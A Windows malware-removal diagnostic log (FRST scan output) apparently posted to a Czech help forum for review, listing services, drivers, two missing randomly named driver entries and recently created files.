U3 WdiServiceHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
U3 WebClient; C:\WINDOWS\System32\webclnt.dll [227328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WebClient; C:\WINDOWS\SysWOW64\webclnt.dll [198656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Wecsvc; C:\WINDOWS\system32\wecsvc.dll [206848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WEPHOSTSVC; C:\WINDOWS\system32\wephostsvc.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wercplsupport; C:\WINDOWS\System32\wercplsupport.dll [94208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WerSvc; C:\WINDOWS\System32\WerSvc.dll [156672 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WiaRpc; C:\WINDOWS\System32\wiarpc.dll [82944 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
U3 WinHttpAutoProxySvc; C:\WINDOWS\system32\winhttp.dll [818176 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WinHttpAutoProxySvc; C:\WINDOWS\SysWOW64\winhttp.dll [636928 2017-03-04] (Microsoft Corporation) [File not signed]
U2 Winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [222720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\system32\WsmSvc.dll [2716672 2016-11-11] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\SysWOW64\WsmSvc.dll [2333184 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wisvc; C:\WINDOWS\system32\flightsettings.dll [635904 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WkSvw32.exe; C:\Program Files (x86)\WIBUKEY\Server\WkSvw32.exe [659336 2013-12-18] (WIBU-SYSTEMS AG)
U3 WlanSvc; C:\WINDOWS\System32\wlansvc.dll [2370048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wlidsvc; C:\WINDOWS\system32\wlidsvc.dll [2104320 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [203264 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1184256 2016-09-27] (Microsoft Corporation) [File not signed]
U3 workfolderssvc; C:\WINDOWS\system32\workfolderssvc.dll [1837056 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WPDBusEnum; C:\WINDOWS\system32\wpdbusenum.dll [88064 2016-07-16] (Microsoft Corporation) [File not signed]
U2 WpnService; C:\WINDOWS\system32\WpnService.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WpnUserService; C:\WINDOWS\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wscsvc; C:\WINDOWS\System32\wscsvc.dll [184832 2016-11-11] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\system32\SearchIndexer.exe [903680 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\SysWOW64\SearchIndexer.exe [773120 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wuauserv; C:\WINDOWS\system32\wuaueng.dll [2317824 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wudfsvc; C:\WINDOWS\System32\WUDFSvc.dll [99840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WwanSvc; C:\WINDOWS\System32\wwansvc.dll [1282048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblAuthManager; C:\WINDOWS\System32\XblAuthManager.dll [1016320 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblGameSave; C:\WINDOWS\System32\XblGameSave.dll [1159680 2016-07-16] (Microsoft Corporation) [File not signed]
U3 XboxNetApiSvc; C:\WINDOWS\system32\XboxNetApiSvc.dll [1025536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
U2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
U3 OverwolfUpdater; "C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM" [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
U3 1394ohci; C:\WINDOWS\System32\drivers\1394ohci.sys [235520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiDev; C:\WINDOWS\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpipagr; C:\WINDOWS\System32\drivers\acpipagr.sys [12288 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiPmi; C:\WINDOWS\System32\drivers\acpipmi.sys [14336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpitime; C:\WINDOWS\System32\drivers\acpitime.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ahcache; C:\WINDOWS\System32\DRIVERS\ahcache.sys [227328 2016-10-15] (Microsoft Corporation) [File not signed]
U3 AmdK8; C:\WINDOWS\System32\drivers\amdk8.sys [123392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AmdPPM; C:\WINDOWS\System32\drivers\amdppm.sys [120832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 applockerfltr; C:\WINDOWS\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AsyncMac; C:\WINDOWS\System32\drivers\asyncmac.sys [28160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicDisplay; C:\WINDOWS\System32\drivers\BasicDisplay.sys [56320 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicRender; C:\WINDOWS\System32\drivers\BasicRender.sys [41472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bcmfn; C:\WINDOWS\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U1 Beep; C:\Windows\System32\Drivers\Beep.sys [9728 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bowser; C:\WINDOWS\System32\DRIVERS\bowser.sys [101888 2016-11-02] (Microsoft Corporation) [File not signed]
U3 BthAvrcpTg; C:\WINDOWS\System32\drivers\BthAvrcpTg.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [65536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthhfhid; C:\WINDOWS\System32\drivers\BthHFHid.sys [31232 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U3 buttonconverter; C:\WINDOWS\System32\drivers\buttonconverter.sys [38912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CapImg; C:\WINDOWS\System32\drivers\capimg.sys [118272 2016-09-10] (Microsoft Corporation) [File not signed]
U4 cdfs; C:\WINDOWS\System32\DRIVERS\cdfs.sys [92160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cdrom; C:\WINDOWS\System32\drivers\cdrom.sys [173056 2016-07-16] (Microsoft Corporation) [File not signed]
U3 circlass; C:\WINDOWS\System32\drivers\circlass.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U2 clreg; C:\WINDOWS\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CmBatt; C:\WINDOWS\System32\drivers\CmBatt.sys [29696 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cmderd; C:\WINDOWS\System32\DRIVERS\cmderd.sys [40952 2016-12-16] (COMODO)
U1 cmdGuard; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [828360 2016-12-16] (COMODO)
U1 cmdhlp; C:\WINDOWS\system32\DRIVERS\cmdhlp.sys [50288 2016-12-16] (COMODO)
U3 CompositeBus; C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_a140581a8f8b58b7\CompositeBus.sys [39936 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Dfsc; C:\WINDOWS\System32\Drivers\dfsc.sys [145408 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmvsc; C:\WINDOWS\System32\drivers\dmvsc.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-08-26] (Disc Soft Ltd)
U1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-12-03] (EldoS Corporation)
U3 ErrDev; C:\WINDOWS\System32\drivers\errdev.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77408 2017-02-24] ()
U3 exfat; C:\Windows\System32\Drivers\exfat.sys [334848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdc; C:\WINDOWS\System32\drivers\fdc.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U1 FileCrypt; C:\WINDOWS\System32\drivers\filecrypt.sys [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Filetrace; C:\WINDOWS\System32\drivers\filetrace.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 flpydisk; C:\WINDOWS\System32\drivers\flpydisk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 gencounter; C:\WINDOWS\System32\drivers\vmgencounter.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U3 genericusbfn; C:\WINDOWS\System32\drivers\genericusbfn.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U1 GpuEnergyDrv; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [8192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HDAudBus; C:\WINDOWS\System32\drivers\HDAudBus.sys [83456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidBth; C:\WINDOWS\System32\drivers\hidbth.sys [108032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidi2c; C:\WINDOWS\System32\drivers\hidi2c.sys [51200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidIr; C:\WINDOWS\System32\drivers\hidir.sys [46592 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidUsb; C:\WINDOWS\System32\drivers\hidusb.sys [38400 2016-09-27] (Microsoft Corporation) [File not signed]
U3 hyperkbd; C:\WINDOWS\System32\drivers\hyperkbd.sys [16384 2016-07-16] (Microsoft Corporation) [File not signed]
U3 i8042prt; C:\WINDOWS\System32\drivers\i8042prt.sys [114176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 iagpio; C:\WINDOWS\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iai2c; C:\WINDOWS\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iaLPSS2i_GPIO2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation) [File not signed]
U3 iaLPSS2_UART2; C:\WINDOWS\System32\drivers\iaLPSS2_UART2.sys [273168 2015-05-04] (Intel Corporation)
U3 iaLPSSi_I2C; C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [113152 2016-07-16] (Intel Corporation) [File not signed]
U3 IndirectKmd; C:\WINDOWS\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U1 inspect; C:\WINDOWS\system32\DRIVERS\inspect.sys [127144 2016-12-16] (COMODO)
U3 intelppm; C:\WINDOWS\System32\drivers\intelppm.sys [134144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [85504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IPNAT; C:\WINDOWS\System32\drivers\ipnat.sys [212480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 irda; C:\WINDOWS\system32\drivers\irda.sys [120320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IRENUM; C:\WINDOWS\System32\drivers\irenum.sys [19456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 kbdhid; C:\WINDOWS\System32\drivers\kbdhid.sys [39424 2016-09-15] (Microsoft Corporation) [File not signed]
U3 kdnic; C:\WINDOWS\System32\drivers\kdnic.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ksthunk; C:\WINDOWS\system32\drivers\ksthunk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U2 lltdio; C:\WINDOWS\System32\drivers\lltdio.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U2 luafv; C:\WINDOWS\system32\drivers\luafv.sys [125952 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-03-15] (Malwarebytes)
U3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-03-15] (Malwarebytes)
U3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-03-15] (Malwarebytes)
U3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251840 2017-03-15] (Malwarebytes)
U3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92088 2017-03-16] (Malwarebytes)
U2 MMCSS; C:\WINDOWS\system32\drivers\mmcss.sys [48128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Modem; C:\WINDOWS\System32\drivers\modem.sys [42496 2016-11-11] (Microsoft Corporation) [File not signed]
U3 monitor; C:\WINDOWS\System32\drivers\monitor.sys [38400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mouhid; C:\WINDOWS\System32\drivers\mouhid.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mpsdrv; C:\WINDOWS\System32\drivers\mpsdrv.sys [75776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MRxDAV; C:\WINDOWS\system32\drivers\mrxdav.sys [143872 2016-10-05] (Microsoft Corporation) [File not signed]
U2 mrxsmb10; C:\WINDOWS\System32\DRIVERS\mrxsmb10.sys [282624 2016-11-11] (Microsoft Corporation) [File not signed]
U3 MsBridge; C:\WINDOWS\System32\drivers\bridge.sys [114688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidkmdf; C:\WINDOWS\System32\drivers\mshidkmdf.sys [8704 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidumdf; C:\WINDOWS\System32\drivers\mshidumdf.sys [11776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSKSSRV; C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys [27136 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MsLldp; C:\WINDOWS\System32\drivers\mslldp.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPCLOCK; C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPQM; C:\WINDOWS\system32\DRIVERS\MSPQM.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSTEE; C:\WINDOWS\system32\DRIVERS\MSTEE.sys [12800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MTConfig; C:\WINDOWS\System32\drivers\MTConfig.sys [15872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NativeWifiP; C:\WINDOWS\System32\DRIVERS\nwifi.sys [535552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NdisCap; C:\WINDOWS\System32\drivers\ndiscap.sys [50176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisImPlatform; C:\WINDOWS\System32\drivers\NdisImPlatform.sys [126464 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Ndisuio; C:\WINDOWS\System32\drivers\ndisuio.sys [63488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisVirtualBus; C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisWan; C:\WINDOWS\System32\drivers\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndiswanlegacy; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndproxy; C:\WINDOWS\System32\DRIVERS\NDProxy.sys [60928 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Ndu; C:\WINDOWS\System32\drivers\Ndu.sys [125440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () [File not signed]
U1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [279040 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [68608 2016-07-16] (Microsoft Corporation) [File not signed]
U1 npsvctrig; C:\WINDOWS\System32\drivers\npsvctrig.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
Re: Prosím o kontrolu logu
U1 nsiproxy; C:\WINDOWS\System32\drivers\nsiproxy.sys [41984 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Null; C:\Windows\System32\Drivers\Null.sys [7168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
U3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
U3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
U3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-02-23] (NVIDIA Corporation)
U3 Parport; C:\WINDOWS\System32\drivers\parport.sys [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U2 PEAUTH; C:\WINDOWS\System32\drivers\peauth.sys [723968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PptpMiniport; C:\WINDOWS\System32\drivers\raspptp.sys [96256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Processor; C:\WINDOWS\System32\drivers\processr.sys [119808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVEdrv; C:\WINDOWS\system32\drivers\qwavedrv.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [17408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasAgileVpn; C:\WINDOWS\System32\drivers\AgileVpn.sys [107520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Rasl2tp; C:\WINDOWS\System32\drivers\rasl2tp.sys [104960 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RasSstp; C:\WINDOWS\System32\drivers\rassstp.sys [77824 2016-07-16] (Microsoft Corporation) [File not signed]
U1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32568 2015-08-15] (EldoS Corporation)
U3 rdpbus; C:\WINDOWS\System32\drivers\rdpbus.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RDPDR; C:\WINDOWS\System32\drivers\rdpdr.sys [177152 2016-07-16] (Microsoft Corporation) [File not signed]
U2 rspndr; C:\WINDOWS\System32\drivers\rspndr.sys [81408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
U3 s3cap; C:\WINDOWS\System32\drivers\vms3cap.sys [9216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scfilter; C:\WINDOWS\System32\DRIVERS\scfilter.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 scmdisk0101; C:\WINDOWS\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serenum; C:\WINDOWS\System32\drivers\serenum.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Serial; C:\WINDOWS\System32\drivers\serial.sys [83968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sermouse; C:\WINDOWS\System32\drivers\sermouse.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 sfloppy; C:\WINDOWS\System32\drivers\sfloppy.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U2 srv; C:\WINDOWS\System32\DRIVERS\srv.sys [410112 2017-03-04] (Microsoft Corporation) [File not signed]
U3 srv2; C:\WINDOWS\System32\DRIVERS\srv2.sys [713216 2016-11-11] (Microsoft Corporation) [File not signed]
U3 srvnet; C:\WINDOWS\System32\DRIVERS\srvnet.sys [248320 2016-09-27] (Microsoft Corporation) [File not signed]
U2 storqosflt; C:\WINDOWS\System32\drivers\storqosflt.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Synth3dVsc; C:\WINDOWS\System32\drivers\Synth3dVsc.sys [64000 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tcpipreg; C:\WINDOWS\System32\drivers\tcpipreg.sys [52224 2017-03-04] (Microsoft Corporation) [File not signed]
U3 tsusbflt; C:\WINDOWS\System32\drivers\TsUsbFlt.sys [61440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TsUsbGD; C:\WINDOWS\System32\drivers\TsUsbGD.sys [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U3 tunnel; C:\WINDOWS\System32\drivers\tunnel.sys [158208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmCx0101; C:\WINDOWS\System32\Drivers\UcmCx.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmTcpciCx0101; C:\WINDOWS\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UcmUcsi; C:\WINDOWS\System32\drivers\UcmUcsi.sys [50688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation) [File not signed]
U4 udfs; C:\WINDOWS\System32\DRIVERS\udfs.sys [320000 2016-07-16] (Microsoft Corporation) [File not signed]
U3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmPass; C:\WINDOWS\System32\drivers\umpass.sys [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbaudio; C:\WINDOWS\system32\drivers\usbaudio.sys [132096 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbcir; C:\WINDOWS\System32\drivers\usbcir.sys [102400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbohci; C:\WINDOWS\System32\drivers\usbohci.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbprint; C:\WINDOWS\System32\drivers\usbprint.sys [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbser; C:\WINDOWS\System32\drivers\usbser.sys [69120 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbuhci; C:\WINDOWS\System32\drivers\usbuhci.sys [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [226816 2016-09-27] (Microsoft Corporation) [File not signed]
U3 vhf; C:\WINDOWS\System32\drivers\vhf.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 VMBusHID; C:\WINDOWS\System32\drivers\VMBusHID.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vmgid; C:\WINDOWS\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vwifibus; C:\WINDOWS\System32\drivers\vwifibus.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
U1 vwififlt; C:\WINDOWS\System32\drivers\vwififlt.sys [73216 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WacomPen; C:\WINDOWS\System32\drivers\wacompen.sys [30208 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wanarpv6; C:\WINDOWS\System32\DRIVERS\wanarp.sys [79872 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wcnfs; C:\WINDOWS\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
U3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
U3 wdiwifi; C:\WINDOWS\System32\DRIVERS\wdiwifi.sys [719872 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wdm_usb; C:\WINDOWS\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
U3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)
U3 WINUSB; C:\WINDOWS\System32\drivers\WinUSB.SYS [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WmiAcpi; C:\WINDOWS\System32\drivers\wmiacpi.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U4 ws2ifsl; C:\WINDOWS\system32\drivers\ws2ifsl.sys [22528 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WudfPf; C:\WINDOWS\System32\drivers\WudfPf.sys [99328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFRd; C:\WINDOWS\System32\drivers\WudfRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdFs; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WUDFWpdMtp; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [216064 2016-07-16] (Microsoft Corporation) [File not signed]
U3 xboxgip; C:\WINDOWS\System32\drivers\xboxgip.sys [258560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 xinputhid; C:\WINDOWS\System32\drivers\xinputhid.sys [43520 2016-09-27] (Microsoft Corporation) [File not signed]
U3 xusb22; C:\WINDOWS\System32\drivers\xusb22.sys [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-03-16] (Zemana Ltd.)
U1 ekswxtuc; \??\C:\WINDOWS\system32\drivers\ekswxtuc.sys [X]
U1 xlkgrbft; \??\C:\WINDOWS\system32\drivers\xlkgrbft.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-03-16 16:40 - 2017-03-16 16:41 - 00042454 _____ C:\Users\Nekut\Desktop\Addition.txt
2017-03-16 16:38 - 2017-03-16 16:46 - 00062427 _____ C:\Users\Nekut\Desktop\FRST.txt
2017-03-16 16:34 - 2017-03-16 16:46 - 00000000 ____D C:\FRST
2017-03-16 16:34 - 2017-03-16 16:34 - 02424832 _____ (Farbar) C:\Users\Nekut\Desktop\FRST64.exe
2017-03-16 16:34 - 2017-03-16 16:34 - 00001956 _____ C:\WINDOWS\system32\Drivers\fvstore.dat
2017-03-16 16:34 - 2017-03-16 16:34 - 00000000 ___HD C:\VTRoot
2017-03-16 16:21 - 2017-03-16 16:47 - 00024411 _____ C:\WINDOWS\ZAM.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:47 - 00014878 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00001223 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Users\Nekut\AppData\Local\Zemana
